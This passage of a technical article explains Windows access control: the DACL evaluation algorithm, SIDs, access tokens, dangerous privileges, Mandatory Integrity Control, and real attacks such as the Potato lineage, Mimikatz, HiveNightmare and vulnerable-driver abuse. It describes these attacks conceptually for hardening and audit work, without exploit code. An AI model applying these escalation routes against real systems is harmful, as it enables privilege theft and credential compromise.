    SRM-&amp;gt;&amp;gt;SRM: Check mandatory integrity label
    SRM-&amp;gt;&amp;gt;SRM: Privilege-bypass short-circuit (SeBackup, SeRestore, SeDebug)
    SRM-&amp;gt;&amp;gt;SRM: Walk DACL in canonical order, deny-first
    SRM--&amp;gt;&amp;gt;ObjMgr: GrantedAccess + STATUS code
    ObjMgr-&amp;gt;&amp;gt;Audit: Emit SACL audit ACE if matched
    ObjMgr--&amp;gt;&amp;gt;App: HANDLE or STATUS_ACCESS_DENIED
&lt;p&gt;Five inputs. One function. One log entry on the way out. The thesis statement of this article is the consequence: every later section is an attack on one of those inputs. JuicyPotato attacks the token. Mimikatz attacks the privilege list. Fodhelper attacks the elevation flow that produces the token. HiveNightmare attacks the security descriptor on a single file. Conditional ACEs and Dynamic Access Control extend the matrix&apos;s &lt;em&gt;subject&lt;/em&gt; dimension by adding claims to the token. UAC tries to keep the token small by default and only inflate it on demand. Every primitive in the article maps cleanly onto one of &lt;code&gt;SeAccessCheck&lt;/code&gt;&apos;s five inputs, and every famous attack tool in the article maps cleanly onto one primitive.&lt;/p&gt;
&lt;p&gt;The function is fixed. The inputs are five. So how does the kernel actually walk a DACL -- and where does the wrong answer come from?&lt;/p&gt;
&lt;h2&gt;4. The DACL Algorithm and the SID Namespace&lt;/h2&gt;
&lt;p&gt;&quot;Walk the DACL in order.&quot; Six words that have generated hundreds of thousands of misconfigured ACLs since 1993. The Microsoft Learn page that ships the algorithm is short and exact. The system &quot;examines each ACE in sequence until... an access-denied ACE explicitly denies any of the requested access rights to one of the trustees listed in the thread&apos;s access token... one or more access-allowed ACEs for trustees listed in the thread&apos;s access token explicitly grant all the requested access rights... All ACEs have been checked and there is still at least one requested access right that has not been explicitly allowed, in which case, access is implicitly denied&quot; [@ms-learn-how-dacls-control-access].&lt;/p&gt;
&lt;p&gt;Three terminations. Deny terminates with denial. Enough allows terminates with grant. End-of-list with anything left ungranted terminates with denial. Note the asymmetry the algorithm encodes: a single deny anywhere in the DACL kills the request, but an allow has to be paired with explicit coverage of every desired bit. The default is denial.&lt;/p&gt;

The ordered list of access-control entries (ACEs) attached to a securable object&apos;s security descriptor that specifies which trustees are granted or denied which access rights. *Discretionary* means the object&apos;s owner controls the list, in contrast to a mandatory list whose entries the system enforces independent of owner intent.

A single grant, deny, audit, or mandatory-label record inside a DACL or SACL. Each ACE carries an SID identifying the trustee, a 32-bit access mask, a flags byte controlling inheritance, and a type discriminator. Windows defines four primary ACE types (`ACCESS_ALLOWED_ACE`, `ACCESS_DENIED_ACE`, `SYSTEM_AUDIT_ACE`, `SYSTEM_MANDATORY_LABEL_ACE`) plus callback variants for conditional ACEs [@ms-learn-ace-strings].
&lt;p&gt;{`
// Faithful implementation of the algorithm at
// learn.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object
// Inputs: token (set of SIDs), DACL (ordered ACEs), desiredAccess mask.
// Output: granted mask + a per-ACE trace of why.&lt;/p&gt;
&lt;p&gt;function seAccessCheck(token, dacl, desiredAccess) {
  let remaining = desiredAccess;       // bits still needed
  let granted = 0;                     // bits accumulated so far
  const trace = [];&lt;/p&gt;
&lt;p&gt;  // NULL DACL grants everything; empty DACL grants nothing.
  if (dacl === null) {
    return { status: &apos;GRANTED (NULL DACL)&apos;, granted: desiredAccess, trace: [&apos;NULL DACL: full access&apos;] };
  }
  if (dacl.length === 0) {
    return { status: &apos;DENIED (empty DACL)&apos;, granted: 0, trace: [&apos;Empty DACL: no access&apos;] };
  }&lt;/p&gt;
&lt;p&gt;  for (let i = 0; i &amp;lt; dacl.length; i++) {
    const ace = dacl[i];
    const sidMatches = token.sids.includes(ace.sid);
    if (!sidMatches) {
      trace.push(`ACE ${i} (${ace.type} ${ace.sid}): SID not in token; skip`);
      continue;
    }
    if (ace.type === &apos;DENY&apos;) {
      const deniedBits = ace.mask &amp;amp; remaining;
      if (deniedBits !== 0) {
        trace.push(`ACE ${i}: DENY hits 0x${deniedBits.toString(16)} -&amp;gt; ACCESS_DENIED`);
        return { status: &apos;DENIED&apos;, granted: 0, trace };
      }
      trace.push(`ACE ${i}: DENY ${ace.sid} 0x${ace.mask.toString(16)} -- no requested bit hit; skip`);
    } else if (ace.type === &apos;ALLOW&apos;) {
      const newBits = ace.mask &amp;amp; remaining;
      granted |= newBits;
      remaining &amp;amp;= ~newBits;
      trace.push(`ACE ${i}: ALLOW grants 0x${newBits.toString(16)}, remaining 0x${remaining.toString(16)}`);
      if (remaining === 0) {
        return { status: &apos;GRANTED&apos;, granted, trace };
      }
    }
  }
  return { status: &apos;DENIED (end of DACL with bits unsatisfied)&apos;, granted: 0, trace };
}&lt;/p&gt;
&lt;p&gt;// Demo: a token with the user&apos;s SID and BUILTIN\Users; DACL with explicit deny + Everyone allow.
const token = { sids: [&apos;S-1-5-21-A-B-C-1001&apos;, &apos;S-1-5-32-545&apos;, &apos;S-1-1-0&apos;] };
const dacl = [
  { type: &apos;DENY&apos;,  sid: &apos;S-1-5-21-A-B-C-1001&apos;, mask: 0x00040000 },  // deny WRITE_DAC
  { type: &apos;ALLOW&apos;, sid: &apos;S-1-1-0&apos;,              mask: 0x00120089 }, // FILE_GENERIC_READ
  { type: &apos;ALLOW&apos;, sid: &apos;S-1-5-32-545&apos;,         mask: 0x001200A9 }, // GENERIC_READ + EXECUTE
];
console.log(seAccessCheck(token, dacl, 0x00040089));
`}&lt;/p&gt;
&lt;p&gt;The runnable above implements three subtleties the prose can flatten. First: the &lt;em&gt;NULL DACL&lt;/em&gt; versus &lt;em&gt;empty DACL&lt;/em&gt; distinction. A descriptor with no DACL at all -- a literal &lt;code&gt;NULL&lt;/code&gt; pointer where the list would be -- grants full access, on the theory that the writer expressed no policy and the kernel will not invent one. A descriptor with a DACL that exists but contains zero ACEs denies everything, because the writer expressed a policy and that policy has no allows. The single most common high-impact misconfiguration in the Windows codebase is code that meant to write the second and wrote the first, or vice versa.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Newly-written code that &quot;creates a file with no protection&quot; almost always wants an empty DACL but ends up with a NULL DACL because of how the SECURITY_DESCRIPTOR initialisation defaults work. Verify with &lt;code&gt;Get-Acl&lt;/code&gt; or &lt;code&gt;icacls&lt;/code&gt; after creation; a NULL DACL surface in &lt;code&gt;icacls&lt;/code&gt; looks like &lt;code&gt;Everyone:(F)&lt;/code&gt; and is almost always a bug, not a feature [@ms-learn-how-dacls-control-access].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Second: ACE &lt;em&gt;order&lt;/em&gt; is the caller&apos;s responsibility. The kernel walks the list in the order it finds it. The &quot;canonical&quot; order Windows expects is four-step, quoted verbatim from the Microsoft Learn reference [@ms-learn-order-of-aces]: &quot;1. All explicit ACEs are placed in a group before any inherited ACEs. 2. Within the group of explicit ACEs, access-denied ACEs are placed before access-allowed ACEs. 3. Inherited ACEs are placed in the order in which they are inherited... 4. For each level of inherited ACEs, access-denied ACEs are placed before access-allowed ACEs.&quot;&lt;/p&gt;
&lt;p&gt;The same page underlines who has to enforce the order: &quot;Functions such as &lt;code&gt;AddAccessAllowedAceEx&lt;/code&gt; and &lt;code&gt;AddAccessAllowedObjectAce&lt;/code&gt; add an ACE to the end of an ACL. It is the caller&apos;s responsibility to ensure that the ACEs are added in the proper order.&quot; If the writer of the DACL hands the kernel an out-of-order list with a deny ACE buried after a wide allow ACE, the deny will be unreachable and the descriptor will silently grant more than the writer intended.&lt;/p&gt;
&lt;p&gt;Third: there is no special case for &quot;Everyone.&quot; The well-known SID &lt;code&gt;S-1-1-0&lt;/code&gt; exists in every token of every process on the machine; an ACE against it applies to every caller. There is no extra logic that says &quot;if this is Everyone, treat it differently from any other group.&quot; James Forshaw made the point with characteristic bluntness in 2020: &quot;don&apos;t forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can&apos;t hear you!&quot; [@tiraniddo-sharing-logon-session]. The DACL evaluation algorithm does not know &quot;Everyone&quot; is special. It is a SID like any other.&lt;/p&gt;
&lt;p&gt;That makes the SID namespace itself worth a tour. Microsoft documents the structure as a revision number, an &lt;em&gt;identifier authority&lt;/em&gt; (a six-byte field that says which authority issued the SID), a list of sub-authorities, and a final &lt;em&gt;relative identifier&lt;/em&gt; (RID) [@ms-learn-security-identifiers]. Microsoft&apos;s own page on SIDs is precise: &quot;A security identifier (SID) is a unique value of variable length used to identify a trustee... When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group.&quot;&lt;/p&gt;
&lt;p&gt;The well-known SIDs the kernel recognises by name include &lt;code&gt;SYSTEM&lt;/code&gt; (S-1-5-18), &lt;code&gt;LocalService&lt;/code&gt; (S-1-5-19), &lt;code&gt;NetworkService&lt;/code&gt; (S-1-5-20), &lt;code&gt;Everyone&lt;/code&gt; (S-1-1-0), &lt;code&gt;Authenticated Users&lt;/code&gt; (S-1-5-11), and the four Mandatory Integrity Control levels (S-1-16-4096 / 8192 / 12288 / 16384) [@en-wiki-mic, @ms-learn-mic]. Machine-issued SIDs encode the machine&apos;s domain identity in the sub-authorities; domain-issued SIDs encode the domain identity. RID 500 is, by convention, the local Administrator account; RID 501 is the Guest account.&lt;/p&gt;

A variable-length, never-reused identifier for a trustee (user, group, machine, service, or capability) inside the Windows security model. SIDs are encoded in canonical form `S-R-I-S1-S2-...-RID`, where R is a revision number, I is the identifier authority, the Sn are sub-authorities issued by that authority, and RID is the relative identifier. Every ACE references an SID; every token contains a list of them [@ms-learn-security-identifiers].
&lt;p&gt;James Forshaw documented in 2017 that Windows generates the per-service SID for &lt;code&gt;NT SERVICE\&amp;lt;ServiceName&amp;gt;&lt;/code&gt; deterministically: it is the SHA-1 hash of the uppercased service name, formatted into the SID&apos;s sub-authority fields. This is why Windows can refer to running services as security principals without an explicit registration step -- the kernel derives the SID on demand [@tiraniddo-trustedinstaller-blog].&lt;/p&gt;
&lt;p&gt;Two SID families this article will not derive: AppContainer &lt;em&gt;Package SIDs&lt;/em&gt; (S-1-15-2-...) and &lt;em&gt;capability SIDs&lt;/em&gt; (S-1-15-3-...). Both arrived with Windows 8 in 2012 and extend the matrix&apos;s subjects with code identity and capability tokens. The sibling &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;App Identity article&lt;/a&gt; in this series carries the canonical derivation, including the Crockford-Base32 PublisherId derivation that produces a Package SID from an MSIX package signature [@app-identity-sibling]. Section 5 of &lt;em&gt;this&lt;/em&gt; article will mention those SIDs in tokens; we will not redefine them here.&lt;/p&gt;
&lt;p&gt;The DACL is half the story. What does the &lt;em&gt;thread&lt;/em&gt; bring to the access check -- and why is the answer &quot;whoever happens to hold the handle&quot;?&lt;/p&gt;
&lt;h2&gt;5. Tokens as Bearer Credentials&lt;/h2&gt;
&lt;p&gt;A token is not a credential the way a password is. A token is a credential the way &lt;em&gt;cash&lt;/em&gt; is: whoever holds it gets the rights. This is the single most important property in the article.&lt;/p&gt;
&lt;p&gt;Microsoft splits tokens into two flavours by purpose [@ms-learn-access-tokens]. A &lt;em&gt;primary token&lt;/em&gt; hangs off a process and represents the security identity that process runs as. Every process has exactly one. An &lt;em&gt;impersonation token&lt;/em&gt; hangs off a thread and lets that thread temporarily act as someone else -- typically a network client whose request the thread is servicing. Tokens are kernel objects with handles, and like every other kernel object the kernel does not care how a process obtained the handle. If the handle resolves to a token in the kernel&apos;s table, the kernel grants the rights the token names.&lt;/p&gt;

A kernel object that names the security identity of a thread or process. It carries the user&apos;s SID, the SIDs of the user&apos;s groups, the privileges the user holds, an integrity level, an integrity-level mandatory policy, an optional list of *restricting* SIDs, a flag distinguishing primary from impersonation tokens, and the impersonation level (Anonymous / Identification / Impersonation / Delegation) [@ms-learn-access-tokens]. The kernel consults a token on every access check for the thread that holds it.

A *primary token* is owned by a process and represents the identity the process runs as; every process has exactly one primary token. An *impersonation token* is owned by a thread and represents an identity the thread is temporarily acting on behalf of -- typically a network client. The primary / impersonation distinction is a discriminator inside the token itself, set when the token is created or duplicated [@ms-learn-access-tokens].
&lt;p&gt;The impersonation flavour acquired its modern shape in Windows 2000. A token&apos;s &lt;em&gt;impersonation level&lt;/em&gt; takes one of four values, ordered from least to most privileged for the impersonator. &lt;em&gt;Anonymous&lt;/em&gt; lets the server know nothing about the client. &lt;em&gt;Identification&lt;/em&gt; lets the server learn the client&apos;s SIDs but not act as the client. &lt;em&gt;Impersonation&lt;/em&gt; lets the server perform local access checks as the client; this is the level a typical RPC server requests. &lt;em&gt;Delegation&lt;/em&gt; lets the server forward the client&apos;s identity onto another machine, useful for multi-hop scenarios but a frequent source of relay-style bugs. Almost every Potato lineage attack consumes an &lt;em&gt;Impersonation&lt;/em&gt;-level token; that is enough to call &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; and run as the client [@itm4n-printspoofer-blog].&lt;/p&gt;
&lt;p&gt;Microsoft documents a third token shape, the &lt;em&gt;restricted token&lt;/em&gt;, that is rare in practice but worth understanding because it is the only place in the model where an explicit deny-list lives on the token itself rather than the descriptor. A restricted token combines three knobs: a list of SIDs converted to &lt;em&gt;deny-only&lt;/em&gt; (their grants count for no allow ACE but their presence still triggers deny ACEs), a list of &lt;em&gt;restricting SIDs&lt;/em&gt; that the access check must independently permit, and a list of privileges removed from the token&apos;s privilege set [@ms-learn-restricted-tokens].&lt;/p&gt;
&lt;p&gt;The kernel runs &lt;code&gt;SeAccessCheck&lt;/code&gt; twice and grants only the intersection: &quot;When a restricted process or thread tries to access a securable object, the system performs two access checks: one using the token&apos;s enabled SIDs, and another using the list of restricting SIDs. Access is granted only if both access checks allow the requested access rights&quot; [@ms-learn-restricted-tokens]. Restricted tokens are operationally niche because the same documentation requires applications using them to &quot;run the restricted application on desktops other than the default desktop. This is necessary to prevent an attack by a restricted application, using &lt;code&gt;SendMessage&lt;/code&gt; or &lt;code&gt;PostMessage&lt;/code&gt;, to unrestricted applications on the default desktop&quot; [@ms-learn-restricted-tokens]. Few applications can spare the desktop overhead.&lt;code&gt;whoami /priv&lt;/code&gt; shows &lt;em&gt;available&lt;/em&gt; privileges, not &lt;em&gt;enabled&lt;/em&gt; privileges. The &lt;code&gt;Enabled&lt;/code&gt; column is the load-bearing one: an available-but-disabled privilege does not affect any access check until the process explicitly enables it via &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt;. The discipline of leaving privileges disabled by default is a defence in depth that depends on the application not having an exploitable bug between disable and use.&lt;/p&gt;
&lt;p&gt;A token also carries flags that drive specific runtime behaviours: a &lt;em&gt;split-token&lt;/em&gt; indicator points at a &lt;em&gt;linked&lt;/em&gt; full-administrator counterpart for the UAC scenario in Section 8; an &lt;em&gt;AppContainer&lt;/em&gt; flag plus a Package SID and capability SIDs name an AppContainer-bound process. In every case, the kernel consults the token by handle and trusts the contents. The kernel does not ask how a process obtained the handle. It asks only what the token says.&lt;/p&gt;
&lt;p&gt;This is the property that organises the rest of the article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; &lt;strong&gt;The Windows access token is a bearer credential.&lt;/strong&gt; Whichever process holds the handle gets the rights. The kernel does not ask how the handle was obtained; it asks only what the token says. This single property explains the entire Potato lineage, Mimikatz &lt;code&gt;token::elevate&lt;/code&gt;, and most of the privilege-abuse canon. Once you see it, every later attack section in the article becomes the same bug repeated against a different token-acquisition primitive.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the token is a bearer credential, anyone with a way to obtain a SYSTEM token&apos;s handle is SYSTEM. Every Potato in Section 10 will be a different way to provoke a SYSTEM-token handle into the attacker&apos;s process. But the access check has another input that bypasses the DACL entirely. What is it, and which attackers know about it?&lt;/p&gt;
&lt;h2&gt;6. Privileges as a Different Dimension&lt;/h2&gt;
&lt;p&gt;Privileges are not access rights. They are pre-checked superpowers. They live on the token, they bypass the DACL for specific operations, and they are baked into the kernel for those operations alone.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s framing on Learn is exact: &quot;Privileges differ from access rights in two ways: Privileges control access to system resources and system-related tasks, whereas access rights control access to securable objects&quot; [@ms-learn-privileges]. The same page makes the operational consequence clear: &quot;Most privileges are disabled by default&quot; [@ms-learn-privileges]. A process that holds a privilege but has not enabled it (via &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt;) cannot use it. The discipline is &quot;principle of least privilege at the millisecond level&quot; -- the privilege is on the token, but it does nothing until the program explicitly turns it on for the next system call.&lt;/p&gt;

A named, kernel-recognised authority on the access token that lets the holder perform a specific class of operations the DACL evaluation alone would not permit. Privileges include `SeDebugPrivilege` (read/write any process), `SeImpersonatePrivilege` (act on a client&apos;s token), `SeAssignPrimaryTokenPrivilege` (start a process under a token), `SeBackupPrivilege` (read any file regardless of DACL), `SeRestorePrivilege` (write any file regardless of DACL), `SeTcbPrivilege` (act as the operating system), and `SeLoadDriverPrivilege` (load a kernel driver). Most are disabled by default and must be enabled via `AdjustTokenPrivileges` before use [@ms-learn-privileges].
&lt;p&gt;The reason privileges deserve a section of their own is that &lt;em&gt;five of them are equivalent to &quot;I am SYSTEM&quot;&lt;/em&gt; and the other dozen are housekeeping. The five-versus-housekeeping split is the load-bearing audit decision in any Windows hardening review. Step through them.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeDebugPrivilege&lt;/code&gt; lets the holder open most processes for full read and write, including processes running as SYSTEM (Protected Process Light targets, such as &lt;code&gt;lsass.exe&lt;/code&gt; under &lt;code&gt;RunAsPPL&lt;/code&gt;, impose additional signer-level restrictions even on &lt;code&gt;SeDebugPrivilege&lt;/code&gt; holders). The privilege exists so that &lt;code&gt;Visual Studio&lt;/code&gt; and &lt;code&gt;WinDbg&lt;/code&gt; can debug code other users have started. The first move in almost every Mimikatz session is &lt;code&gt;privilege::debug&lt;/code&gt;, which enables the privilege the local administrator already has on the token [@github-gentilkiwi-mimikatz, @en-wiki-mimikatz]. Once enabled, the next Mimikatz command opens &lt;code&gt;lsass.exe&lt;/code&gt; and reads the credentials.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; lets the holder accept any token offered by a client and act as that client. The privilege is held by every Windows service account by default -- IIS, SQL Server, the Print Spooler, scheduled tasks, Docker containers, Citrix, the entire population of background services that need to handle authenticated requests. &lt;em&gt;This is the load-bearing privilege for the Potato lineage&lt;/em&gt; [@itm4n-printspoofer-blog]. Section 10 will spend twenty paragraphs on what a service account holding &lt;code&gt;SeImpersonate&lt;/code&gt; can be tricked into doing; the privilege is the entry condition.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; lets the holder launch a new process under any primary token. Combined with &lt;code&gt;SeImpersonate&lt;/code&gt;, the pair gives an attacker the entire token-replay attack: get an impersonation handle to a SYSTEM token, then call &lt;code&gt;CreateProcessAsUser&lt;/code&gt; to run a command as SYSTEM. itm4n quotes decoder_it on the operational consequence.&lt;/p&gt;

if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM. -- decoder_it, quoted by itm4n in the PrintSpoofer disclosure [@itm4n-printspoofer-blog]
&lt;p&gt;&lt;code&gt;SeBackupPrivilege&lt;/code&gt; lets the holder read any file regardless of DACL, on the theory that backup software has to. &lt;code&gt;SeRestorePrivilege&lt;/code&gt; is the symmetric write privilege. The two together mean that a process holding both can rewrite any file on the machine, including service binaries.&lt;/p&gt;
&lt;p&gt;The 2021 &lt;em&gt;HiveNightmare&lt;/em&gt; / &lt;em&gt;SeriousSAM&lt;/em&gt; vulnerability (CVE-2021-36934) is the worked example of what happens when the model assumes nobody but the backup process has read access to a sensitive file and the assumption breaks. The NVD description is exact: &quot;An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database&quot; [@nvd-cve-2021-36934]. The DACL on &lt;code&gt;\Windows\System32\config\SAM&lt;/code&gt; was itself overly permissive (it granted &lt;code&gt;BUILTIN\Users&lt;/code&gt; read starting with Windows 10 1809). The live file cannot normally be read because the kernel holds it open with an exclusive lock; the &lt;em&gt;Volume Shadow Copy&lt;/em&gt; mirror inherits the same permissive DACL but is not locked, so any local user could read the SAM hashes through the shadow-copy device path.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s fix required not just a patch but a manual operator step: &quot;After installing this security update, you must manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerability&quot; [@nvd-cve-2021-36934]. A patch alone could not erase the historical shadow copies that already had the wrong DACL.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeTcbPrivilege&lt;/code&gt; lets the holder &quot;act as the operating system&quot; -- it is the privilege that grants identity to the kernel itself. Held only by &lt;code&gt;LocalSystem&lt;/code&gt; services in well-administered environments. A non-system process that somehow acquired &lt;code&gt;SeTcb&lt;/code&gt; is, in effect, indistinguishable from the kernel.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; lets the holder load a kernel driver. By itself the privilege is harmless, because the loaded driver still has to be properly signed for HVCI / Driver Signature Enforcement to accept it. Combined with a known-vulnerable signed driver, however, the privilege becomes the entry point for &lt;em&gt;bring-your-own-vulnerable-driver&lt;/em&gt; (BYOVD) attacks: load a benign-looking but exploitable signed driver, then use its bug to execute arbitrary kernel code. Two worked examples bracket the class.&lt;/p&gt;
&lt;p&gt;The kernel-read/write half of the class is best illustrated by Micro-Star&apos;s &lt;code&gt;RTCore64.sys&lt;/code&gt; (CVE-2019-16098 [@nvd-cve-2019-16098]), the MSI Afterburner driver that &quot;allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs&quot; [@nvd-cve-2019-16098]. In October 2022, the threat actors behind the BlackByte ransomware weaponised the primitive at scale [@sophos-blackbyte]: the dropper loaded &lt;code&gt;RTCore64.sys&lt;/code&gt;, then walked the kernel&apos;s &lt;code&gt;PspCreateProcessNotifyRoutine&lt;/code&gt; callback array and zeroed every entry, blinding every registered process-creation callback before the encryption stage ran.&lt;/p&gt;
&lt;p&gt;Sophos&apos;s October 4, 2022 disclosure named the technique exactly: &quot;We found a sophisticated technique to bypass security products by abusing a known vulnerability in the legitimate vulnerable driver RTCore64.sys. The evasion technique supports disabling a whopping list of over 1,000 drivers on which security products rely to provide protection&quot; [@sophos-blackbyte].&lt;/p&gt;
&lt;p&gt;The kernel-code-execution half of the class is GIGABYTE&apos;s &lt;code&gt;gdrv.sys&lt;/code&gt; (CVE-2018-19320 [@nvd-cve-2018-19320]). The NVD description states the primitive directly: &quot;The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier... exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system&quot; [@nvd-cve-2018-19320]. A signed &lt;code&gt;IOCTL&lt;/code&gt; accepts an attacker-supplied source pointer, destination pointer, and length, and copies kernel memory at ring 0 -- a write-what-where primitive that the attacker can compose with the read-anywhere primitive of &lt;code&gt;RTCore64.sys&lt;/code&gt; to mint arbitrary kernel code execution.&lt;/p&gt;
&lt;p&gt;CISA added GIGABYTE Multiple Products to the Known Exploited Vulnerabilities Catalog on October 24, 2022 with a remediation due date of November 14, 2022, citing in-the-wild exploitation [@nvd-cve-2018-19320]. The U.S. federal-civilian executive branch had two weeks to remediate; the rest of the install base did not.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s structural answer is the Microsoft-recommended driver blocklist, enabled by default on every device since the Windows 11 2022 update [@ms-learn-driver-blocklist]. The Learn page is exact about coverage: the blocklist targets drivers with &quot;known security vulnerabilities that an attacker could exploit to elevate privileges in the Windows kernel&quot;, and explicitly catches drivers whose behaviours &quot;circumvent the Windows Security Model&quot; [@ms-learn-driver-blocklist].&lt;/p&gt;
&lt;p&gt;Both &lt;code&gt;RTCore64.sys&lt;/code&gt; and &lt;code&gt;gdrv.sys&lt;/code&gt; appear on the blocklist; the ride from disclosure to default-on enforcement was four years for &lt;code&gt;RTCore64&lt;/code&gt;, four years for &lt;code&gt;gdrv&lt;/code&gt;, and the same arc applies to every member of the class. Honourable mention: &lt;code&gt;aswArPot.sys&lt;/code&gt; (CVE-2022-26522 / CVE-2022-26523 [@sentinelone-avast-avg]) shows the same pattern from a security-product driver, with SentinelLabs reporting &quot;two high severity flaws in Avast and AVG... that went undiscovered for years affecting dozens of millions of users&quot; before the silent fix [@sentinelone-avast-avg].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On a Windows machine, holding any of &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;, &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt;, &lt;code&gt;SeBackupPrivilege&lt;/code&gt;, or &lt;code&gt;SeRestorePrivilege&lt;/code&gt; is operationally indistinguishable from being SYSTEM. The other privileges in the standard token (the long tail of &lt;code&gt;SeShutdown&lt;/code&gt;, &lt;code&gt;SeIncreaseWorkingSet&lt;/code&gt;, &lt;code&gt;SeTimeZone&lt;/code&gt;, &lt;code&gt;SeChangeNotify&lt;/code&gt;, &lt;code&gt;SeUndock&lt;/code&gt;, &lt;code&gt;SeIncreaseQuota&lt;/code&gt;...) are housekeeping. Audit the holders of the five accordingly: any non-LocalSystem-equivalent account that holds them is a target.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The DACL is the load-bearing thing for &lt;em&gt;file&lt;/em&gt; access, but exactly &lt;em&gt;one bad DACL&lt;/em&gt; on a sensitive file ends the model. HiveNightmare proved that the cost of getting a single security descriptor wrong on a single file is the entire credential database. The general rule the lesson encodes: every primitive in Section 3&apos;s input list has at least one production example where misuse of that primitive alone dropped the security model to zero.&lt;/p&gt;
&lt;p&gt;Discretionary access control assumes the principal -- the user -- is the right unit of authorisation. By 2006, exploitable user-mode code had proven the principal was wrong. What did Microsoft do?&lt;/p&gt;
&lt;h2&gt;7. Mandatory Integrity Control: Stapling No-Write-Up onto DAC&lt;/h2&gt;
&lt;p&gt;November 2006. Vista releases to manufacturing, and for the first time in Windows history, the kernel&apos;s access check fires &lt;em&gt;before&lt;/em&gt; the DACL walk -- on something other than the user&apos;s identity. The new layer is &lt;em&gt;Mandatory Integrity Control&lt;/em&gt; (MIC), and it adds a four-level lattice to every securable object in the system.&lt;/p&gt;
&lt;p&gt;Microsoft Learn frames MIC compactly. &quot;MIC uses integrity levels and mandatory policy to evaluate access. Security principals and securable objects are assigned integrity levels that determine their levels of protection or access. For example, a principal with a low integrity level cannot write to an object with a medium integrity level, even if that object&apos;s DACL allows write access to the principal&quot; [@ms-learn-mic]. The same page enumerates the levels: &quot;Windows defines four integrity levels: low, medium, high, and system&quot; [@ms-learn-mic]. The levels are encoded as four well-known SIDs: Low (S-1-16-4096), Medium (S-1-16-8192), High (S-1-16-12288), System (S-1-16-16384) [@en-wiki-mic].&lt;/p&gt;

A Windows kernel mechanism, introduced with Vista (released to manufacturing November 8, 2006; consumer general availability January 30, 2007 [@en-wiki-windows-vista]), that adds an integrity-level check to `SeAccessCheck`. Each securable object carries an integrity label inside its SACL; each access token carries an integrity level. An access whose direction violates the configured *mandatory policy* (typically *no-write-up*) is denied at the integrity check before the DACL walk runs. MIC is the mandatory layer the Windows DAC model historically lacked [@ms-learn-mic].

A linearly-ordered tag (Low / Medium / High / System) carried on every Windows process token and every securable object. The kernel uses the relative ordering to enforce mandatory policy independent of the object&apos;s DACL. The four well-known SIDs are S-1-16-4096 (Low), S-1-16-8192 (Medium), S-1-16-12288 (High), and S-1-16-16384 (System) [@en-wiki-mic].
&lt;p&gt;The default policy is &lt;em&gt;no-write-up&lt;/em&gt;. A process at integrity level $L$ cannot modify an object at integrity level greater than $L$, regardless of what the DACL says. Microsoft&apos;s example is the load-bearing one: a process running at Low IL cannot write to a Medium-IL object even if the DACL says Everyone has full control. The integrity check fires &lt;em&gt;before&lt;/em&gt; the DACL walk; if the integrity check denies, the DACL is not consulted [@ms-learn-mic].&lt;/p&gt;
&lt;p&gt;The integrity label is stored as a &lt;code&gt;SYSTEM_MANDATORY_LABEL_ACE&lt;/code&gt; inside the SACL, not the DACL [@ms-learn-system-mandatory-label-ace]. The mask field on the label ACE encodes which directions of access the policy forbids: &lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_WRITE_UP (0x1)&lt;/code&gt;, &lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_READ_UP (0x2)&lt;/code&gt;, and &lt;code&gt;SYSTEM_MANDATORY_LABEL_NO_EXECUTE_UP (0x4)&lt;/code&gt; [@ms-learn-system-mandatory-label-ace].&lt;/p&gt;
&lt;p&gt;Storing the label in the SACL is a deliberate choice with one operational consequence: tools that copy the DACL but not the SACL silently drop the integrity label. The most common consequence is a Low-IL file getting copied to a new location and emerging with no integrity label, which defaults to Medium and unintentionally raises the object&apos;s protection. The opposite mistake -- a Medium-IL file losing its label and dropping to Low -- is the more dangerous one.&lt;/p&gt;
